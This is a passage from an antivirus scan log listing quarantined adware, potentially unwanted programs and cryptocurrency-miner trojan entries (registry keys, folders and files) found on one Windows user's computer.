    Adware.Tuto4PC, HKLM\SOFTWARE\Foldershare, Quarantined, [2805], [536223],1.0.9182
    Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Polygen_RASMANCS, Quarantined, [779], [568552],1.0.9182
    Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Polygen.exe, Quarantined, [779], [568551],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\bestavicampaign563, Quarantined, [446], [584322],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\campaign9961, Quarantined, [446], [518478],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\multitimercampaign84170, Quarantined, [446], [518476],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\Speedycar, Quarantined, [446], [518473],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\TechnologyDesktopnew, Quarantined, [446], [518479],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\iewiouoxxf, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{38519D9A-952D-4D91-9C1A-8C4F1933B519}, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{38519D9A-952D-4D91-9C1A-8C4F1933B519}, Quarantined, [6000], [571190],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{A2AB8BC7-BF40-4EB1-BCF0-454B8BFC22A2}, Quarantined, [6000], [598042],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\hjuzju, Quarantined, [6000], [622124],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CE636CD2-BC9F-45B0-86B6-6533DEC76BA4}, Quarantined, [6000], [622124],1.0.9182
    Trojan.BitCoinMiner.BatBitRst, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{CE636CD2-BC9F-45B0-86B6-6533DEC76BA4}, Quarantined, [6000], [622124],1.0.9182
    PUP.Optional.Wajam, HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
    PUP.Optional.Wajam, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182
    PUP.Optional.Wajam, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9, Quarantined, [202], [170024],1.0.9182

    Registry Value: 36
    RiskWare.BitCoinMiner, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CloudNet, Quarantined, [732], [512160],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\EWMON|PARTNER, Quarantined, [2805], [411133],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [797], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Quarantined, [797], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNF, Quarantined, [797], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, Quarantined, [797], [259987],1.0.9182
    Adware.Wajam, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\S-1-5-19\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\S-1-5-20\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    Adware.Wajam, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Quarantined, [494], [-1],0.0.0
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Quarantined, [797], [259988],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8222286, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|WK27HXJEIFMX6EE, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8735117, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|T9KTUNJFV82076N, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|9428290, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|U943W0QT19CB97H, Quarantined, [3707], [392931],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNF, Quarantined, [797], [259517],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\ENVIRONMENT|SNP, Quarantined, [797], [259518],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|3525589, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|URD8WCW2ZCRHWKK, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|NNHJYS7S607ZBCR, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|9236653, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|8581968, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|44K3AH7DLU628F4, Quarantined, [3707], [392931],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|5608956, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC.Generic, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|1293914, Quarantined, [3707], [521959],1.0.9182
    Adware.Tuto4PC, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\BIGTIME|PARTNER, Quarantined, [2805], [411132],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, Quarantined, [797], [259989],1.0.9182
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DISPLAYNAME, Quarantined, [252], [259314],1.0.9182
    Adware.ICLoader, HKLM\SOFTWARE\MICROSOFT\DMUNVERSION|VERSION, Quarantined, [446], [518477],1.0.9182
    PUP.Optional.Linkury, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DISPLAYNAME, Quarantined, [252], [259313],1.0.9182
    Trojan.BitCoinMiner.Generic, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CHROME, Quarantined, [3755], [525944],1.0.9182
    PUP.Optional.CloudNet, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\FIREWALLRULES|{11A88E17-3A04-4D89-B347-E025C0716D1A}, Quarantined, [6124], [446028],1.0.9182
    PUP.Optional.BazzSearch, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|nmeinlfojlcegblpogpjbhipmonclejh, Quarantined, [225], [550044],1.0.9182

    Registry Data: 7
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH PAGE, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH BAR, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCHASSISTANT, Replaced, [797], [293485],1.0.9182
    PUP.Optional.Linkury, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Replaced, [252], [293476],1.0.9182
    PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Replaced, [252], [293477],1.0.9182
    PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Replaced, [797], [293486],1.0.9182

    Data Stream: 0
    (No malicious items detected)

    Folder: 36
    PUP.Optional.CloudNet, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CSRSS, Quarantined, [6124], [448845],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\1ZEXA4TQAG, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\5OOXISXWZZ, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7KTDBVJ05S, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7SOU0UO9PV, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\B7SDX8A68H, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CXCLBJAGPJ, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\FVCE9F427V, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HXDOI2P3DW, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\RJE5VFPVEL, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\TPP28A3HUL, Quarantined, [2805], [487473],1.0.9182
    RiskWare.BitCoinMiner, C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, C:\USERS\THOMAZING!\APPDATA\ROAMING\EpicNet Inc, Quarantined, [732], [512160],1.0.9182
    Adware.Tuto4PC, C:\PROGRAM FILES (X86)\FOLDERSHARE, Quarantined, [2805], [474043],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\de, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\en, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\es, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\fr, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ru, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7zS096D0AA2, Quarantined, [6100], [635578],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm49E9.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4D74.tmp, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm54A7.tmp, Quarantined, [494], [511084],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\ElectronCash, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\ElectrumLTC, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\MultiDoge, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Electrum, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Ethereum, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\Exodus, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\ProgramData\VMR6PC5JA6GYC9V0XH3B\files\Wallets\JAXX, Quarantined, [602], [628365],1.0.9182
    Trojan.BitCoinMiner, C:\PROGRAMDATA\VMR6PC5JA6GYC9V0XH3B\FILES\Wallets, Quarantined, [602], [628365],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\OTIZAMD5IS, Quarantined, [3707], [404709],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES (X86)\0QFOY55ME3I, Quarantined, [3707], [404875],1.0.9182
    Adware.Tuto4PC.Generic, C:\PROGRAM FILES\XUL9ZBX11Q, Quarantined, [3707], [404610],1.0.9182

    File: 140
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\Joybam.tst, Quarantined, [3745], [404871],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\Silsoning.tst, Quarantined, [3745], [404871],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\NOAH.DAT, Quarantined, [3745], [404865],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\MD.XML, Quarantined, [3745], [404866],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\AGENT.DAT, Quarantined, [3745], [404872],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\UNINSTALL_TEMP.ICO, Quarantined, [3745], [404862],1.0.9182
    PUP.Optional.CloudNet, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, C:\Users\Thomazing!\AppData\Local\Temp\csrss\updateprofile-0128.exe, Quarantined, [6124], [448845],1.0.9182
    PUP.Optional.CloudNet, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Quarantined, [6124], [448845],1.0.9182
    Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Quarantined, [416], [455564],1.0.9182
    Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, Quarantined, [416], [430694],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\MAIN.DAT, Quarantined, [3745], [442900],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\1ZEXA4TQAG\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\1ZEXA4TQAG\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\5OOXISXWZZ\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\5OOXISXWZZ\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\5OOXISXWZZ\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7KTDBVJ05S\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7KTDBVJ05S\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7KTDBVJ05S\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7SOU0UO9PV\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7SOU0UO9PV\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\7SOU0UO9PV\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\B7SDX8A68H\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\B7SDX8A68H\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\B7SDX8A68H\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\CXCLBJAGPJ\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\CXCLBJAGPJ\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\CXCLBJAGPJ\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\FVCE9F427V\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\SecondL.exe, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\FVCE9F427V\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\HXDOI2P3DW\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\HXDOI2P3DW\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\HXDOI2P3DW\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\RJE5VFPVEL\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\RJE5VFPVEL\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\RJE5VFPVEL\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\TPP28A3HUL\OneTwo.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\TPP28A3HUL\SecondL.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Tuto4PC, C:\Users\Thomazing!\AppData\Local\Temp\TPP28A3HUL\up.exe.config, Quarantined, [2805], [487473],1.0.9182
    Adware.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\SHAM.DB, Quarantined, [3745], [516189],1.0.9182
    RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\{44244107-8600-4170-9FE9-B04F411A8CD2}, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, C:\USERS\THOMAZING!\APPDATA\ROAMING\EpicNet Inc\CLOUDNET\cloudnet.exe, Quarantined, [732], [512160],1.0.9182
    RiskWare.BitCoinMiner, C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\tmp7FE1.tmp, Quarantined, [732], [512160],1.0.9182
    Adware.Linkury.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\SHAM.DB, Quarantined, [3745], [516191],1.0.9182
    Adware.Tuto4PC, C:\PROGRAM FILES (X86)\FOLDERSHARE\FOLDERSHARE.EXE.CONFIG, Quarantined, [2805], [474043],1.0.9182
    Adware.Tuto4PC, C:\Program Files (x86)\foldershare\foldershare.exe, Quarantined, [2805], [474043],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\7zS096D0AA2\BundleConfig.xml, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\de\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\en\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\es\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\fr\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ru\DevLib.resources.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\2019.02.08_21.55.21.861811_installer_pid=8312.txt, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\Carrier.EXE, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\DevLib.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\ExternalResource.XML, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\GenericSetup.exe, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\GenericSetup.exe.config, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\installer.exe, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\Microsoft.Win32.TaskScheduler.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\uTorrent.dll, Quarantined, [6100], [635578],1.0.9182
    PUP.Optional.BundleInstaller.Generic, C:\Users\Thomazing!\AppData\Local\Temp\7zS096D0AA2\WizardPages.dll, Quarantined, [6100], [635578],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm39E0.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
    Adware.Wajam, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\wjm4579.tmp\update.exe, Quarantined, [494], [511084],1.0.9182
